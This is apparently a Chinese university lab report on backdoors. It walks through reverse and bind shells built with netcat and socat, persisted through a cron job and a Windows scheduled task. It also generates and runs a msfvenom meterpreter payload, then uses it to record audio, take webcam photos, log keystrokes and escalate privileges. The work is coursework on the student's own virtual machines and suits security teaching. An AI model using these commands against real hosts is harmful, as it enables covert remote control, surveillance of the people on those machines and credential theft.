20154312《网络对抗》Exp2 后门原理与实践
常见问题快速链接
常用后门工具实践
Windows获得Linux Shell
- Windows:使用
ipconfig
指令查看本机IP:
使用
ncat.exe
程序监听本机的4312
端口:
Kali:使用
nc
指令的-e
选项反向连接Windows主机的4312
端口:Windows下成功运行Kali的shell,运行
ls
指令如下:
Linux获得Windows Shell
Kali:
ifconfig
查看IP:
Kali使用
nc
指令监听4312
端口:
Windows:使用
ncat.exe
程序的-e
选项项反向连接Kali主机的4312
端口:
Kali:运行Windows的cmd shell并输入命令执行:
使用nc传输数据
Windows下监听
4312
端口:
Kali下连接到Windows的
4312
端口:
建立之后进行文字传输,后面会说道用来传输后门:
实验内容
使用netcat获取主机操作Shell,cron启动
先在Windows系统下,监听
4312
端口:
在Kali环境下,使用
man crontab
指令查看crontab
命令的帮助文档:crontab
指令可以用于设置周期性被执行的指令。该命令从标准输入设备读取指令,并将其存放于crontab
文件中,以供之后读取和执行。
用
crontab -e
指令编辑一条定时任务,选择编辑器时选择基本的vim编辑器就行:在最后一行添加
59 * * * * /bin/netcat 192.168.15.131 4312 -e /bin/sh
,意思是在每个小时的第59分钟反向连接Windows主机的4312
端口,设置成59的原因是我当时的时间是11:55(这样过一会就能看到连接效果了)
当时间到了11:59时,此时已经获得了Kali的shell,可以输入指令
使用socat获取主机操作Shell, 任务计划启动
基础知识
socat
是ncat
的增强版,它使用的格式是socat [options] <address> <address>
,其中两个address
是必选项,而options
是可选项。socat
的基本功能就是建立两个双向的字节流,数据就在其间传输,参数address
就是代表了其中的一个方向。所谓流,代表了数据的流向,而数据则可以有许多不同的类型,命令中也就相应需要许多选项对各种不同的类型数据流进行限定与说明。
实践过程
在Windows系统下,打开控制面板下搜索任务计划就可以开始创建任务,填写任务名称后,新建一个触发器:
在操作->程序或脚本中选择你的
socat.exe
文件的路径,在添加参数一栏填写tcp-listen:4312 exec:cmd.exe,pty,stderr
(两个参数之间用空格或者;),这个命令的作用是把cmd.exe
绑定到端口4312
,同时把cmd.exe
的stderr重定向到stdout上:
创建完成之后,可以
windows+L
锁定计算机让它执行,也可以像我一样直接右键运行它。
此时,在Kali环境下输入指令
socat - tcp:192.168.15.131:43121
,这里的第一个参数-
代表标准的输入输出,第二个流连接到Windows主机的4312
端口,此时可以发现已经成功获得了一个cmd shell:
使用MSF meterpreter生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell
输入指令
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.15.132 LPORT=4312 -f exe > 20154312_backdoor.exe
生成后门程序:
通过
nc
指令将生成的后门程序传送到Windows主机上(Linux需要输入的指令见上图):
在Kali上使用
msfconsole
指令进入msf控制台,使用监听模块,设置payload,设置反弹回连的IP和端口:
设置完成后,执行监听:
打开Windows上的后门程序:
20154312_backdoor.exe
此时Kali上已经获得了Windows主机的连接,并且得到了远程控制的shell:
使用MSF meterpreter生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权
使用
record_mic
指令截获一段音频:
使用
webcam_snap
指令可以使用摄像头进行拍照:
使用
webcam stream
指令可以使用摄像头进行录像:
不好意思_忘记截图了,直接输命令就好.jpg使用
screenshot
指令可以进行截屏:
使用
keyscan_start
指令开始记录下击键的过程,使用keyscan_dump
指令读取击键的记录:
先使用
getuid
指令查看当前用户,使用getsystem
指令进行提权,如图所示,提权成功:
实验遇到的问题
Handler failed to bind to xxx.xxx.xx.xxx:xxxx
问题描述:使用exploit命令后产生的提示,无法通过这个端口进行监听。
解决方案:其实这个问题产生的原因是Kali本身的IP地址发生了变化
这是之前的IP Adr
这是现在的,很明显看到了IPAdr
发生了变化,我们首先要更改msf
的参数,将LHOST
修改为当前的IPAdr
。之后再修改我们生成的后门文件中的IPAdr
就可以了。
使用Webcam_snap命令提示1411错误,无法正常拍照
问题描述:输入webcam_snap
之后提示1411错误
问题解决:首先我想到的是windows系统里可能压根没有摄像头(我的win7也是虚拟机),因为摄像头这种USB设备不可能虚拟机和本机一起使用,所以我先检查一下设备管理器
果然没有摄像头设备,那我们就把摄像头的USB连接切到win7上面来
在虚拟机->可移动设备->Chiconyxxxxxxxxx这里选择连接主机
OK!我们可以看到有图像设备了。
基础问题回答
- 例举你能想到的一个后门进入到你系统中的可能方式?
- 捆绑在软件中
- 注入在可执行文件里
- 注入在office文件的宏里面
- 例举你知道的后门如何启动起来(win及linux)的方式?
- 更改名字伪装成其他程序
- Linux可以使用cron启动
- Windows下通过任务计划来启动后门程序
- Meterpreter有哪些给你映像深刻的功能?
- 获取摄像头权限进行拍照
- 获取麦克风权限进行录音
- 提升用户权限!!!!!
- 如何发现自己有系统有没有被安装后门?
- 杀毒软件进行扫描,没做过免杀的直接就能被扫出来
- 观察进程以及端口,看看有没有异常
实验体会
这个实验做起来真的很有激情,一步一步地往前推,然后达到一些神奇的结果,真的挺有意思的。
不过,还是更期待免杀的实验,能达到一些更高层次的入侵。
20154312《网络对抗》Exp2 后门原理与实践的更多相关文章
- 20155323刘威良 网络对抗 Exp2 后门原理与实践
20155323 刘威良<网络攻防>Exp2后门原理与实践 实验内容 (1)使用netcat获取主机操作Shell,cron启动 (0.5分) (2)使用socat获取主机操作Shell, ...
- 20155331 丹增旦达 网络攻防 Exp2后门原理与实践
20155331 丹增旦达<网络攻防>Exp2后门原理与实践 实验内容 (1)使用netcat获取主机操作Shell,cron启动 (2)使用socat获取主机操作Shell, 任务计划启 ...
- 20155302 Exp2 后门原理与实践
20155302<网络对抗>后门原理与实践 实验要求 1.使用netcat获取主机操作Shell,cron启动 (0.5分) 2.使用socat获取主机操作Shell, 任务计划启动 (0 ...
- 2018-2019-2 网络对抗技术 20165232 Exp2 后门原理与实践
2018-2019-2 网络对抗技术 20165232 Exp2 后门原理与实践 1. 后门原理与实践实验说明及预备知识 一.实验说明 任务一:使用netcat获取主机操作Shell,cron启动 ( ...
- 20155324《网络对抗》Exp2 后门原理与实践
20155324<网络对抗>Exp2 后门原理与实践 20155324<网络对抗>Exp2 后门原理与实践 常用后门工具实践 Windows获得Linux Shell 在Win ...
- 2018-2019-2 20165237《网络对抗技术》Exp2 后门原理与实践
2018-2019-2 20165237<网络对抗技术>Exp2 后门原理与实践 一.实践目标 使用netcat获取主机操作Shell,cron启动 使用socat获取主机操作Shell, ...
- 2018-2019-2 网络对抗技术 20165325 Exp2 后门原理与实践
2018-2019-2 网络对抗技术 20165325 Exp2 后门原理与实践 实验内容(概要): (1)使用netcat获取主机Shell,cron启动 首先两个电脑(虚拟机)都得有netcat, ...
- 2018-2019-2 网络对抗技术 20165206 Exp2 后门原理与实践
- 2018-2019-2 网络对抗技术 20165206 Exp2 后门原理与实践 - 实验任务 (1)使用netcat获取主机操作Shell,cron启动 (0.5分) (2)使用socat获取主 ...
- 2018-2019-2 网络对抗技术 20165323 Exp2 后门原理与实践
2018-2019-2 网络对抗技术 20165323 Exp2 后门原理与实践 一.实验要求 (3.5分) (1)使用netcat获取主机操作Shell,cron启动 (0.5分) (2)使用soc ...
- 2018-2019-2 20165235《网络对抗技术》Exp2 后门原理与实践
2018-2019-2 20165235<网络对抗技术>Exp2 后门原理与实践 实验内容 1.使用netcat获取主机操作Shell,cron启动 2.使用socat获取主机操作Shel ...
随机推荐
- 关于Jmeter3.0,你必须要知道的5点变化
2016.5.18日,Apache 发布了jmeter 3.0版本,本人第一时间上去查看并下载使用了,然后群里或同事都会问有什么样变化呢?正好在网上看到一遍关于3.0的文章,但是是英文的.这里翻译一下 ...
- 画面渲染:实时渲染(Real-time Rendering)、离线渲染(Offline Rendering)[转]
实时渲染(Real-time Rendering) 实时渲染的本质就是图形数据的实时计算和输出.最典型的图形数据源是顶点.顶点包括了位置.法向.颜色.纹理坐标.顶点的权重等.在第一代渲染技术中(198 ...
- 美团开源 SQL 优化工具 SQLAdvisor
https://www.oschina.net/news/82725/sqladvisor-opensource https://github.com/Meituan-Dianping/SQLAdvi ...
- Transient修饰符的使用
如果一个类没有继承Serilizable接口,那么它就不能被序列化,写入文件的时候会报异常.如果一个类继承了Serilizable接口,那么这个类的所有属性和方法都可以自动被序列化,而现实中我们又希望 ...
- Solve minGW g++ has stopped working 程序停止运行
之前在机子装了个很早版本的MinGW,苦于不支持c++11,所以打算卸载掉安装个新版本的.可是网上找了很多版本装好后,编译成功,运行的时候总是弹出 *.exe has stopped working的 ...
- spring boot+mybatis 系列
https://blog.csdn.net/linxingliang/article/details/52324937 https://www.cnblogs.com/a8457013/p/90749 ...
- 插入排序之python
插入排序( Insert sort) 通过构建有序序列,对于未排序数据,在已排序序列中从后向前扫描,找到相应位置并插入: 由于不需要全部都比较完,所以排序速度优于冒泡和选择排序. #插入排序就像是斗地 ...
- WebFlux Spring Security配置
最小化可运行配置 package com.terwergreen.bugucms.config; import org.apache.commons.logging.Log; import org.a ...
- 洛谷P3244 落忆枫音 [HNOI2015] 拓扑排序+dp
正解:拓扑排序+dp 解题报告: 传送门 我好暴躁昂,,,怎么感觉HNOI每年总有那么几道题题面巨长啊,,,语文不好真是太心痛辣QAQ 所以还是要简述一下题意,,,就是说,本来是有一个DAG,然后后来 ...
- Git使用常见问题脚本
receive.denyCurrentBranch 这是由于git默认拒绝了push操作,需要进行设置,修改.git/config添加如下代码: [receive] denyCurrentBr ...